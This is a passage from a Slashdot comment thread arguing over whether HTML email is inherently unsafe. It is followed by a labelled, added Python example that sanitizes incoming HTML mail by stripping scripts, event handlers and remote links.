    Look beyond things transmitted by email. Every day people find flaws in your favorite operating systems including ways to gain root access and do as they please. And every day someone is fixing that kind of problem. Every day we learn something new which often requires us to change software and change the way we run it to improve security.

    You sound very confident that you are secure, that it can't happen to you. I think you have a false sense of security. If you and your system were perfect, totally secure and immune to tampering by someone from the outside....well, you would have solved the problem for everyone. You'll be in high demand.

    Oh, and about that plain text email....yeah, you do study all the source for your email reader before you compile it. Right?

    --
    . Quit playing Monopoly with Bill. Switch to one of many non-Microsoft products today.
  43. Re:OR by misleb · · Score: 2, Insightful
    You could just simply not view messages from people you don't know. This would solve the majority of problems. I mean if I don't know you, I don't read mail from you, I mean there are times when I take the chance, but let's face it, how often do random people email your personal account?

    I get the occasional email from strangers or people I don't normally communicate with via email. For instance, someone from Usenet or a mailing list might email me. I'd hate to miss any one of those. I think it is reasonable to tell people not to open strange attachments, but it isn't reasonable to suggest that people don't even open an email from a stranger. That is just paranoid and unnecessary with reasonable measures taken. Turning off the stupid HTML "feature," don't open strange attachments, run a Bayesian SPAM filter, and everything should be just fine.

    -matthew

    --
    "THERE IS NO JUSTICE, THERE IS ONLY ME." -Death
  44. Sigh scare mongerer. by SmallFurryCreature · · Score: 2, Insightful
    Repeat after me. HTML RENDERING IS NOT HARMFUL. We are here on slashdot not the bloody bbc. All that rendering html in an email could do is send info that you read the email by opening a link to a server under a spammers. Yes this is undesirable since it allows them to verify a spammed address is alive.

    Nothing else. All the other troubles are due to the execution of scripts. If the various graphical email programs would just stick to rendering html and leave javascript and others untouched then there would be no email-viruses. (well except for the ones launched through buffer overflows)

    So it would only require a little bit of thought to give people the "nice" look of html email without the security problems. Prohibit external links and only allow links to attached files (which since they are links without script can't be executed until the viewer clicks them) and you will even remove the privacy invasion. All the attractiveness of the web without the insecurity.

    Given all that why exactly was the execution of code added to email? There must have been a decision made at MS at sometime but anyone ever see the reasons for it?

    Oh and don't get me wrong. I hate html formatted emails since they are a pain to read on remote shell. Sadly I am a linux geek and everyone else seems to disagree. No, other slashdotters do not matter, you are geeks too.

    --

    MMO Quests are like orgasms:

    You may solo them, I prefer them in a group.

  45. HTML email by phorm · · Score: 2, Insightful

    A lot of people are blaming this on allowing HTML in email, but the fact is that HTML is a *STATIC* language... it can't - or at least shouldn't be able to - hurt your PC.

    Now, by either having a parse exploit with the HTML (bad client coding), or allowing scripts (really poor security) then problems arise...

    Personally, I dumped Outlook a loooong time ago. Thunderbird is nice and not hard for most users to switch to, my primary beef is that it doesn't seem to have an option to block images but allow by sender/site - or to allow a particular message to be clicked to show images (some catalogues I get via subscription in my email have images I want to see)
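
Added example, not part of any comment in this thread: the policy described in comments 44 and 45 (keep static HTML, drop scripts, allow links only to the message's own attachments), written as a Python filter. The tag allowlist, treating `cid:` URLs as the attachment links, and the sample message are assumptions constructed here.

```python
from html import escape
from html.parser import HTMLParser

# Assumed policy for this example: static formatting tags only.
ALLOWED = {"p", "br", "b", "i", "em", "strong", "a", "img", "ul", "ol", "li", "blockquote"}
DROP_WITH_CONTENT = {"script", "style", "iframe", "object"}  # tag and everything inside it
VOID = {"br", "img"}

class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0  # skip > 0 while inside a dropped container

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1  # an unclosed container drops the rest: fail closed
        if self.skip or tag not in ALLOWED:
            return
        kept = []
        for name, value in attrs:
            value = (value or "").strip()
            # href/src survive only when they point at an attached part (cid:);
            # on* handlers, style and remote URLs are dropped.
            if name in ("href", "src") and value.lower().startswith("cid:"):
                kept.append((name, value))
            elif name in ("alt", "title"):
                kept.append((name, value))
        attr_text = "".join(f' {n}="{escape(v, quote=True)}"' for n, v in kept)
        self.out.append(f"<{tag}{attr_text}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in ALLOWED and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))

def sanitize(html_body):
    parser = MailSanitizer()
    parser.feed(html_body)
    parser.close()
    return "".join(parser.out)

# Constructed sample message body, not taken from the analysed spam.
SAMPLE = ('<p onclick="go()">Your <b>e-card</b> is here</p><script>go()</script>'
          '<img src="http://remote.example/open.gif" alt="card">'
          '<a href="http://remote.example/card">view</a>'
          '<a href="cid:card1">attached card</a>')
```

The remote image loses its `src`, so opening the message no longer confirms the address to the sender, and the only link that still works is the one to the attached part.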

  46. Re:OR by Reziac · · Score: 3, Insightful

    There's also the little minor issue that even people on your whitelist can unknowingly send you malicious email.

    Real-world example: My sister (who, *if* I used a whitelist, would naturally be on it) added some downloaded toolbar to her browser, which in turn reformatted her email as it was being sent (she never saw the alterations)... and what I got in my mailbox was HTML formatted, with javascript that tried to fetch and install the same spyware toolbar (but was foiled by my braindead mail client).

    And other folks on private mailing lists I'm on (which would also be whitelisted) have also unknowingly sent virus attachments. This happened on a mailing list populated by sysadmins, not exactly "regular users who don't know anything".

    Crap, now I gotta go find another story to spend my mod points on :)

    --
    ~REZ~ #43301. Who'd fake being me anyway?